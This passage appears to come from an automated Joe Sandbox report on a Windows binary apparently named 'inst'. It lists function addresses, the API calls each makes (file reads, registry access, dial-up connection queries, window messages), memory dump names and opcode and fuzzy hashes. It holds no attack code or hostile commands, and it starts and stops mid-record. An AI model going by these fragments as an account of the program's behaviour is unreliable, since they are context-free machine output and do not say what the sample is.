                                                                                                                                                                      • Opcode ID: 8cc5c849388d8ae857f3e2120c2b29b6c103b3d8ff9ce3a2ef6243e70bd7cfd5
                                                                                                                                                                      • Instruction ID: 2e5ac2051009f2469c0e6c8b3f07b4078df3474a72689a6baa6e57fd92333b81
                                                                                                                                                                      • Opcode Fuzzy Hash: 8cc5c849388d8ae857f3e2120c2b29b6c103b3d8ff9ce3a2ef6243e70bd7cfd5
                                                                                                                                                                      • Instruction Fuzzy Hash: E2F0C271C00A99EBCF22BFA68C0289F3B70BF11B11F118569FC145A091D7358A62DB91
                                                                                                                                                                      Function 5F4E7D94 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4E7DCA
                                                                                                                                                                        • Part of subcall function 5F5131EC: _memset.LIBCMT ref: 5F513151
                                                                                                                                                                        • Part of subcall function 5F5131EC: RasEnumConnectionsW.RASAPI32(?,?,?), ref: 5F51317C
                                                                                                                                                                        • Part of subcall function 5F5131EC: _memset.LIBCMT ref: 5F51319B
                                                                                                                                                                        • Part of subcall function 5F5131EC: RasGetConnectStatusW.RASAPI32(?,?), ref: 5F5131B0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$ConnectConnectionsEnumStatus
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3492228599-0
                                                                                                                                                                      • Opcode ID: 5794bdef16936b5e868cad13ea8041dd5d8bec93e3ce9616094bff550c755689
                                                                                                                                                                      • Instruction ID: c1f372c6b56dda3f0e624b59e1ad7eca881f6b362d1857b4884e7c4b20358eac
                                                                                                                                                                      • Opcode Fuzzy Hash: 5794bdef16936b5e868cad13ea8041dd5d8bec93e3ce9616094bff550c755689
                                                                                                                                                                      • Instruction Fuzzy Hash: DDF096B2D0131477DB50A6F5DC45FCB7BEC9B40761F408526EA25D6290EB70E514CBE1
                                                                                                                                                                      Function 5F4D8B0A Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_String_base::_Xlen.LIBCPMT ref: 5F4D8B1A
                                                                                                                                                                        • Part of subcall function 5F541FB5: __EH_prolog3.LIBCMT ref: 5F541FBC
                                                                                                                                                                        • Part of subcall function 5F541FB5: __CxxThrowException@8.LIBCMT ref: 5F541FE7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8H_prolog3String_base::_ThrowXlenstd::_
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1675473389-0
                                                                                                                                                                      • Opcode ID: e9131c7728ce30436ca99ece98399f72f173fd2ed61b558046b14b774d739e84
                                                                                                                                                                      • Instruction ID: 0edff1dda5de325d48b6bec5ef7a4ccd6912d93fe4dc0271055a38f54803fd4d
                                                                                                                                                                      • Opcode Fuzzy Hash: e9131c7728ce30436ca99ece98399f72f173fd2ed61b558046b14b774d739e84
                                                                                                                                                                      • Instruction Fuzzy Hash: 06F0E9F13076106BDB21992888789BFB6EBDFC1A20F100E5FF463C3290DB71A84581A2
                                                                                                                                                                      Function 001A2343 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 001A236A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 846599473-0
                                                                                                                                                                      • Opcode ID: b415b2cee114baeefc9e86f4f87a69a0303cc209efa906d7075c1278cbe592ad
                                                                                                                                                                      • Instruction ID: 2c226c7450f649e9e9da97fd32717c7b15bd1533e4b119a3658cf69ff5598195
                                                                                                                                                                      • Opcode Fuzzy Hash: b415b2cee114baeefc9e86f4f87a69a0303cc209efa906d7075c1278cbe592ad
                                                                                                                                                                      • Instruction Fuzzy Hash: 0FF0E77290020AEFCB10DFADC8449AEFBF8FF95604F00455AA455E2211D7706A01CB50
                                                                                                                                                                      Function 00178940 Relevance: 1.5, APIs: 1, Instructions: 32registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00178967
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: 88c3212ebc80cc17f2d8c472aac7e543886ed3a3b0ad33c5e618d84c2a3c499d
                                                                                                                                                                      • Instruction ID: 5fdb88df03094fa8903ebb5cddc59590f65905b950105bc5748addc23d59a22b
                                                                                                                                                                      • Opcode Fuzzy Hash: 88c3212ebc80cc17f2d8c472aac7e543886ed3a3b0ad33c5e618d84c2a3c499d
                                                                                                                                                                      • Instruction Fuzzy Hash: DEF0F47610120AEFDF05DF80DC05EEE7B79EF58344F10801AFE4156260DB76AA21DBA0
                                                                                                                                                                      Function 001B566F Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,?), ref: 001B56A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                                                      • Opcode ID: 77e497e4194b5653e94522e762f1e1e18f222cb81776387d327aeb49302edff2
                                                                                                                                                                      • Instruction ID: f21655097f11ded1cb75edf5dba33bdb65d2fab22b29f5bb797053cbac2ba84d
                                                                                                                                                                      • Opcode Fuzzy Hash: 77e497e4194b5653e94522e762f1e1e18f222cb81776387d327aeb49302edff2
                                                                                                                                                                      • Instruction Fuzzy Hash: 6AF0A773105211AFC611AF99DC44C4FFBBDEFC8710711890AF65687151C730D845CBA1
                                                                                                                                                                      Function 5F51C7F0 Relevance: 1.5, APIs: 1, Instructions: 32windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F528425: _malloc.LIBCMT ref: 5F52843F
                                                                                                                                                                      • PostMessageW.USER32(5F5BC3F0,000004CB,00000000,00000001), ref: 5F51C839
                                                                                                                                                                        • Part of subcall function 5F51C522: _memset.LIBCMT ref: 5F51C530
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2839725968-0
                                                                                                                                                                      • Opcode ID: 0cdf9f17a4aad3188a0d5fc7db694cdbacd4a423c804a4c097e2b9cc4c55f176
                                                                                                                                                                      • Instruction ID: d67bef712a8d988452b46833094e9f332fc7646ec2c9092f55c5c005cf5d4ebc
                                                                                                                                                                      • Opcode Fuzzy Hash: 0cdf9f17a4aad3188a0d5fc7db694cdbacd4a423c804a4c097e2b9cc4c55f176
                                                                                                                                                                      • Instruction Fuzzy Hash: A9F01DB46153019FE708DF25D458D96BBE1EF84320F12C96EA4898B395D771E801CA91
                                                                                                                                                                      Function 001AF07C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001AF083
                                                                                                                                                                        • Part of subcall function 001AEF1E: __EH_prolog3.LIBCMT ref: 001AEF25
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                                      • Opcode ID: c355c4ea72dd5ae056c3653c306d8a9c5ded732e4f9e4faa593af82a726a65d3
                                                                                                                                                                      • Instruction ID: bae524271ec1e0343edf066ce2943f88a2f873474d39301481d1a29cdda2d408
                                                                                                                                                                      • Opcode Fuzzy Hash: c355c4ea72dd5ae056c3653c306d8a9c5ded732e4f9e4faa593af82a726a65d3
                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0273A901618AFCB119F9089017DD3BA2EF1A720F044518FD605B2E2D7358A52AB81
                                                                                                                                                                      Function 5F51C72F Relevance: 1.5, APIs: 1, Instructions: 31windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F528425: _malloc.LIBCMT ref: 5F52843F
                                                                                                                                                                      • PostMessageW.USER32(5F5BC3F0,000004CD,00000000,00000001), ref: 5F51C776
                                                                                                                                                                        • Part of subcall function 5F51C522: _memset.LIBCMT ref: 5F51C530
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2839725968-0
                                                                                                                                                                      • Opcode ID: 46e6307414f11b4cc3926c609d7415700a668694d2c7d0ee3c996a6a88d8eca5
                                                                                                                                                                      • Instruction ID: 351252728c1bb0e21b38143d71ad49e1b0d4bab571756db8c4d05ce7b55b5452
                                                                                                                                                                      • Opcode Fuzzy Hash: 46e6307414f11b4cc3926c609d7415700a668694d2c7d0ee3c996a6a88d8eca5
                                                                                                                                                                      • Instruction Fuzzy Hash: 17F0B4B96013009FE7089F19D408EA2FBF5EFC4720B15C46EA4488B291D7B2EC41CB50
                                                                                                                                                                      Function 5F516BE8 Relevance: 1.5, APIs: 1, Instructions: 31registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,5F4F5BD5,customproxytype,?,FF4173A1), ref: 5F516C13
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3660427363-0
                                                                                                                                                                      • Opcode ID: 4ab598b453c1cf5901ce718a6f9bd654490634c60baf5d7b91e665fa523f3560
                                                                                                                                                                      • Instruction ID: 8193370e37f10e5c32041684da301b3156773ac45b612a90b598413bcfd2c33a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ab598b453c1cf5901ce718a6f9bd654490634c60baf5d7b91e665fa523f3560
                                                                                                                                                                      • Instruction Fuzzy Hash: D5F0FEB6610205FBEB09DFA4C844FDA7BA8EB04358F00852CBD46D7280E670F648CA60
                                                                                                                                                                      Function 00181631 Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00181634
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                      • Opcode ID: 2fc6311a118a79d63f124e98dc89630e5abd5456607a6f8c624c2ee476cd98c2
                                                                                                                                                                      • Instruction ID: 06e6f9ccc340d0d03e90e8ae3b667ce052a20b13f0579da7994843545fea6d85
                                                                                                                                                                      • Opcode Fuzzy Hash: 2fc6311a118a79d63f124e98dc89630e5abd5456607a6f8c624c2ee476cd98c2
                                                                                                                                                                      • Instruction Fuzzy Hash: A4F082365007008FD7249B38F809BD273E9FB54362F15486EE0A6C7045E7B4D986CF90
                                                                                                                                                                      Function 00163E90 Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000,?,00164DC5,?,00000000,?,00000000,?,?,00161043,?), ref: 00163E9B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: 2702f5fdabb35c4d6f74e61abfbc9e5af622b941ec63b87cd5935f7f4cc41dc8
                                                                                                                                                                      • Instruction ID: 74c10e27f710d3f1a5837a6ae83f80e1b98d8b4e8eff0d2ff8c371d7292e09b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 2702f5fdabb35c4d6f74e61abfbc9e5af622b941ec63b87cd5935f7f4cc41dc8
                                                                                                                                                                      • Instruction Fuzzy Hash: 19E04FE6B282103EE614B6A47E4AF6B229CDFD0B04F244429B84AD2540FB5199209673
                                                                                                                                                                      Function 001D6A97 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNEL32(00000002,?,00198D5A,00000000,00000000,?,?,001D6931,?,0000011E,FFFFFEE2,00000002,?,00000000,00000000,00000748), ref: 001D6AC1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: d80683ec956ba6354ef95f37c32e74b709ca4f978c2bd24e605e510bb5d29f95
                                                                                                                                                                      • Instruction ID: 231a55755f542a53593892e1182b43c1b3a33487412f9e3a5b11c092d7f6e899
                                                                                                                                                                      • Opcode Fuzzy Hash: d80683ec956ba6354ef95f37c32e74b709ca4f978c2bd24e605e510bb5d29f95
                                                                                                                                                                      • Instruction Fuzzy Hash: 1FE0C931500128FB8F109F69DA0199A7BA8EB25391B10C566F856E6290F731DE10EF60
                                                                                                                                                                      Function 001CA29F Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GdipDrawImageRectI.GDIPLUS(?,00000000,?,?,?,?,?,?,001CFC56,?,?,?,00000000,?,?), ref: 001CA2C2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DrawGdipImageRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2615643336-0
                                                                                                                                                                      • Opcode ID: 57e98256349b33f45eac1a576c0902249758a86366d920aef6816e6e1e3cefaa
                                                                                                                                                                      • Instruction ID: 90ba91004f110d45a889bd9ba0cb8391f1d09a9c2861f76c6848058c6d854624
                                                                                                                                                                      • Opcode Fuzzy Hash: 57e98256349b33f45eac1a576c0902249758a86366d920aef6816e6e1e3cefaa
                                                                                                                                                                      • Instruction Fuzzy Hash: F4E0483250411DAF9F128F95DD00DA77BE9EF24354B454429BD06C6521D732DC30EBE1
                                                                                                                                                                      Function 00182982 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 001829C2
                                                                                                                                                                        • Part of subcall function 001E4656: RaiseException.KERNEL32(?,?,?,001680B1,?,?,?,?,?,001680B1,0023F5B8,0023F5B8), ref: 001E4698
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
